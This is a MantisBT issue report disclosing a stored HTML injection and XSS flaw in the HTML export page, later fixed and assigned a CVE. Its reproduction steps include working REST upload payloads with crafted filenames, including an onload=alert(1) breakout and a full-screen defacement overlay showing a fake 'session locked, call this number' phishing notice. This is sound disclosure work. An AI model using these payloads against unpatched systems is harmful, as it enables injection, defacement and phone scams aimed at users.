View Issue Details

IDProjectCategoryView StatusLast Update
0037234mantisbtsecuritypublic2026-07-15 08:07
Reporterdracosectech Assigned Todregad  
PrioritynormalSeverityminorReproducibilityalways
Status closedResolutionfixed 
Target Version2.28.4Fixed in Version2.28.4 
Summary0037234: CVE-2026-62944: Stored HTML injection via unescaped attachment filename extension in HTML export
Description

A missing output encoding call in print_all_bug_page_word.php at line 492 allows an authenticated user to inject arbitrary HTML attributes into an <img> tag via a crafted attachment filename. The alt attribute value is derived from the file extension through strtolower(pathinfo($t_attachment['display_name'], PATHINFO_EXTENSION)) at core/file_api.php:543-544 and is output without string_attribute() or htmlspecialchars() encoding. This is an inconsistency on the same output line: the display name at line 483 is correctly encoded with string_attribute(), and the download URL at line 484 is correctly encoded with htmlspecialchars(). The alt attribute was missed.

An attacker uploads a file with a crafted name such as probe." onload="alert(1) where the file content is detected as image/* by finfo_file(). When any user views the HTML export page (print_all_bug_page_word.php?type_page=html&export=1), the rendered <img> tag becomes <img src="..." alt="" onload="alert(1)" />, breaking out of the alt attribute. The upload path (file_add at file_api.php:914) does not sanitize filename characters, so the crafted extension passes through unmodified to the attachment metadata.

MantisBT's default Content Security Policy (script-src 'self') blocks inline event handler execution in modern browsers, so JavaScript execution requires either a CSP-relaxed configuration (script-src with 'unsafe-inline' or along with 'unsafe-eval') or a non-CSP-enforcing browser. However, the HTML injection itself is unmitigated regardless of CSP, an attacker can inject arbitrary HTML elements and attributes into the export page. This could be used to inject phishing content (pure text without dot and slash), alter the visual layout of the exported document (defacement).

Steps To Reproduce
  1. Log in as any user with file upload permission on a project.

  2. Create or identify a bug in that project to attach a file to.

  3. Upload an attachment with a crafted filename that breaks out of the alt attribute. The filename extension becomes the alt value, so the injection is in the extension portion. The following is example to inject onload=... to perform XSS (works only under no / relaxed CSP config with `script-src: 'unsafe-inline'):

    Via REST API:

    POST /api/rest/issues/{bug_id}/files
    Content-Type: application/json
    Authorization: <api_token>
    
    {"files":[{"name":".\" onload=\"alert(1)","content":"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAP//////////////////////////////////////////////////////////////////////////////////////2wBDAf//////////////////////////////////////////////////////////////////////////////////////wAARCAABAAEDASIAAhEBAxEB/8QAFAABAAAAAAAAAAAAAAAAAAAACf/EABQQAQAAAAAAAAAAAAAAAAAAAAD/xAAUAQEAAAAAAAAAAAAAAAAAAAAA/8QAFBEBAAAAAAAAAAAAAAAAAAAAAP/aAAwDAQACEQMRAD8AKwA="}]}
  4. As any authenticated user, visit the HTML export page:

    /print_all_bug_page_word.php?type_page=html&export=1

    Ensure the project containing the target bug is selected.

  5. Inspect the page source via browser's dev tool (F12) and search for onload. You will find an <img> tag with the injected attribute:

    <img src="file_download.php?file_id=...&type=bug" alt="" onload="alert(1)" />

    The alt attribute breakout is confirmed. The closing " from the crafted filename terminates the alt attribute, and the remainder is parsed as additional HTML attributes.

  6. In a browser without CSP enforcement (or with a relaxed CSP), the onload handler would execute when the image loads. In a default MantisBT installation, CSP blocks the inline handler, but the HTML injection is visible in the DOM regardless.

Defacement payload (works with MantisBT's default config):

{"files":[{"name":".\"><div style=\"position:fixed;top:0;left:0;width:100vw;height:100vh;z-index:99999;background:#fff;color:#000;font-size:28px;padding:40px\">MantisBT Security Notice — your session is locked; Call +1 123 1234-5678 to unlock<br>demo of defacement<x=","content":"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAP//////////////////////////////////////////////////////////////////////////////////////2wBDAf//////////////////////////////////////////////////////////////////////////////////////wAARCAABAAEDASIAAhEBAxEB/8QAFAABAAAAAAAAAAAAAAAAAAAACf/EABQQAQAAAAAAAAAAAAAAAAAAAAD/xAAUAQEAAAAAAAAAAAAAAAAAAAAA/8QAFBEBAAAAAAAAAAAAAAAAAAAAAP/aAAwDAQACEQMRAD8AKwA="}]}
Additional Information

Credits:
Dracosec Research Limited (Chris Chan, Krecendo Hui, William Lam)

TagsNo tags attached.
Attached Files
xss-alert1-csp-violation.png (75,058 bytes)   
xss-alert1-csp-violation.png (75,058 bytes)   
xss-alert1-DOM.png (272,534 bytes)   
xss-alert1-DOM.png (272,534 bytes)   
defacement-result.png (116,024 bytes)   
defacement-result.png (116,024 bytes)   

Relationships

related to 0037237 closeddregad Printing an issue having notes without text triggers PHP error 

Activities

dregad

dregad

2026-06-03 12:06

developer   ~0071220

Confirmed. Thanks for your report !

dregad

dregad

2026-06-28 08:08

developer   ~0071263

Advisory https://github.com/mantisbt/mantisbt/security/advisories/GHSA-h2wf-967x-gxvw created and CVE request sent.

dracosectech

dracosectech

2026-07-01 20:51

reporter   ~0071272

Hi @dregad,

Thanks for handling this issue.

Would you please help to add back the credit section as it is missing during issue reporting?
Dracosec Research Limited (Chris Chan, Krecendo Hui, William Lam)

Additionally, could you help granting access for our GitHub account for reviewing the GH Security Advisory?
dracosectech-code (Name: DracoSec.Tech)

Many thanks.

dregad

dregad

2026-07-02 17:18

developer   ~0071276

@dracosectech done and done.

dregad

dregad

2026-07-15 08:05

developer   ~0071300

CVE-2026-62944 assigned

Related Changesets

MantisBT: master-2.28 bdd0e364

2026-06-08 09:03

dregad


Details Diff
Fix XSS in print_all_bug_page_word.php

Unescaped file extension was printed in <img> tag alt attribute.
Consistently call string_html_specialchars() on printed variables.

Use printf() instead echo to improve code readability.

Replace `<br />` by `<br>`.

Fixes 0037234
Affected Issues
0037234
mod - print_all_bug_page_word.php Diff File